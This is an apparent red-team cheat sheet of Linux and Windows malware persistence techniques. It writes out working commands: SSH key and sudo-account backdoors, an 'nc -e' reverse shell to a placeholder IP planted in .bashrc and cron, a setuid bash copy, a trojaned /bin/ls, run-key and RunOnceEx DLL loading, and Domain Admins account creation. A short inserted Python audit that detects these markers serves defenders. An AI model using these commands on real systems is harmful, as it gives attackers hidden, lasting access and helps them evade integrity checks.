Malware persistence techniques

Linux

PDF - Linux Red Team Persistence Techniques

PDF - My Methods To Achieve Persistence In Linux Systems

PDF - Understanding Linux Malware

SSH Key

echo <public_key> >> /root/.ssh/authorized_keys
echo <public_key> >> /home/<user>/.ssh/authorized_keys

Add new account

useradd -m -s /bin/bash ftp
usermod -aG sudo ftp
passwd ftp

Shell configuration backdoor

  • .bashrc : Executed every time a user starts an interactive (non-login) shell, e.g. a fresh terminal session.
  • .bash_profile : Executed every time a user logs into a system (login shell).

Example :

echo 'nc -e /bin/bash <IP> <PORT> 2>/dev/null &' >> ~/.bashrc

Exposed services backdoor

  • webshell

Cronjobs

$ crontab -e
* * * * * nc <IP> <PORT> -e /bin/sh
/etc/cron.hourly/
/etc/crontab
/etc/cron.daily/

Local privesc

cp /bin/bash /bin/sys
chmod u+s /bin/sys
/bin/sys -p

System services / boot scripts

systemd

[Service]
Type=simple
ExecStartPre=<PAYLOAD>
...

rc script

/etc/rc.d/rc.local
/etc/rc.conf
/etc/init.d/
/etc/rcX.d/
/etc/rc.local

X desktop autostart

  • ~/.config/autostart

File replacement / infection

ls backdoor :

$ mv /bin/ls /bin/ls2
$ cat ls
#!/bin/bash

PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin

<BACKDOOR>
/bin/ls2 "$@"
$ chmod a+x ./ls
$ mv ./ls /bin/ls

A backdoored md5sum, sha256sum or other *sum binary that returns the original (good) hashes for the backdoored binaries, so integrity checks run with the host's own tools appear clean.

$ md5sum /bin/ls
b9dcdfcaea8082f5f5879086fdf7f2e2  /bin/ls
$ sha256sum /bin/ls
f48db5b77c6fddb35548fb86c6e279e5d18c55d2d4ff9adae66a2d582187e7c7  /bin/ls
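As an added defender-side example (not part of the original cheat sheet): a Python audit that walks the Linux locations listed above, flags shell rc files and cron entries carrying the reverse-shell markers used in these snippets (nc -e, bash -i, /dev/tcp, mkfifo), and finds setuid copies of a stock shell (the cp + chmod u+s trick) by hashing files in-process rather than trusting a possibly trojaned sha256sum. The search paths, the marker regex and the `root` parameter (so it can be pointed at a mounted image) are assumptions of this example.

```python
import hashlib
import re
import stat
from pathlib import Path
# Markers drawn from the techniques above: nc -e reverse shells, ncat, bash -i, /dev/tcp, mkfifo pipes.
SUSPICIOUS = re.compile(r"(\bnc\b.*\s-e\s|\bncat\b|/dev/tcp/|\bbash\s+-i\b|\bmkfifo\b)")
RC_FILES = (".bashrc", ".bash_profile", ".profile", ".zshrc")
CRON_DIRS = ("etc/cron.d", "var/spool/cron/crontabs", "var/spool/cron")
BIN_DIRS = ("bin", "usr/bin", "usr/local/bin", "tmp")
SHELLS = ("bin/bash", "bin/sh", "bin/dash")

def scan_text(path):
    # Returns (path, lineno, line) for non-comment lines matching SUSPICIOUS; unreadable file -> [].
    try:
        lines = path.read_text(errors="replace").splitlines()
    except OSError:
        return []
    return [(str(path), n, line.strip()) for n, line in enumerate(lines, 1)
            if not line.lstrip().startswith("#") and SUSPICIOUS.search(line)]

def scan_shell_rc(root):
    homes = [root / "root"] + [p for p in (root / "home").glob("*") if p.is_dir()]
    return [h for home in homes for name in RC_FILES for h in scan_text(home / name)]

def scan_cron(root):
    files = [root / "etc/crontab"] + [f for d in CRON_DIRS for f in (root / d).glob("*") if f.is_file()]
    return [h for f in files for h in scan_text(f)]

def sha256(path):
    # Hashed in-process on purpose: a trojaned sha256sum can report the stock hash for a modified file.
    try:
        with open(path, "rb") as fh:
            return hashlib.sha256(fh.read()).hexdigest()
    except OSError:
        return None

def is_suid_regular(f):
    try:
        st = f.lstat()
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)

def find_suid_shell_copies(root):
    # Setuid regular files in BIN_DIRS whose bytes equal a stock shell, reported as (path, which shell).
    known = {sha256(root / s): s for s in SHELLS if (root / s).is_file()}
    suid = [f for d in BIN_DIRS for f in (root / d).glob("*") if is_suid_regular(f)]
    return [(str(f), known[h]) for f in suid for h in [sha256(f)] if h in known]

def audit(root="/"):
    root = Path(root)
    return {"shell_rc": scan_shell_rc(root), "cron": scan_cron(root),
            "suid_shell_copies": find_suid_shell_copies(root)}
```

Run `audit()` as root on the live host, or `audit("/mnt/image")` against a mounted disk image; an empty result for every key is the expected baseline.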

Windows

MITRE ATT&CK - Persistence

Scheduled Task

at 12:00 cmd /c <PAYLOAD>

Startup folder

Placing a program within a startup folder will also cause that program to execute when a user logs in.

  • Current user : C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • All users : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Registry keys

Adding an entry to the "run keys" in the Registry will cause the program referenced to be executed when a user logs in.

Registry run key entries can reference programs directly or list them as a dependency.

For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

The following Registry keys can be used to set startup folder items for persistence:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

The following Registry keys can control automatic startup of services during boot:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.

Shortcut Modification

Create a malicious shortcut that looks like a legitimate program.

Screensaver

  • https://pentestlab.blog/2019/10/09/persistence-screensaver/

PowerShell Profile

A profile is a Windows PowerShell ISE script that runs automatically when you start a new session.

Six different profiles :

  • Current User, Current Host – console : $Home\[My ]Documents\WindowsPowerShell\Profile.ps1
  • Current User, All Hosts : $Home\[My ]Documents\Profile.ps1
  • All Users, Current Host – console : $PsHome\Microsoft.PowerShell_profile.ps1
  • All Users, All Hosts : $PsHome\Profile.ps1
  • Current user, Current Host – ISE : $Home\[My ]Documents\WindowsPowerShell\Microsoft.PowerShellISE_profile.ps1
  • All users, Current Host – ISE : $PsHome\Microsoft.PowerShellISE_profile.ps1

DLL Hijacking

Service Hijacking

Create account

Local account :

net user /add <account_name> <account_password>
net user /delete <account_name>

Domain account :

net user /add <account_name> <account_password> /domain
net group "Domain Admins" <account_name> /add /domain

Software component

  • Webshell
  • SQL stored procedures
  • ...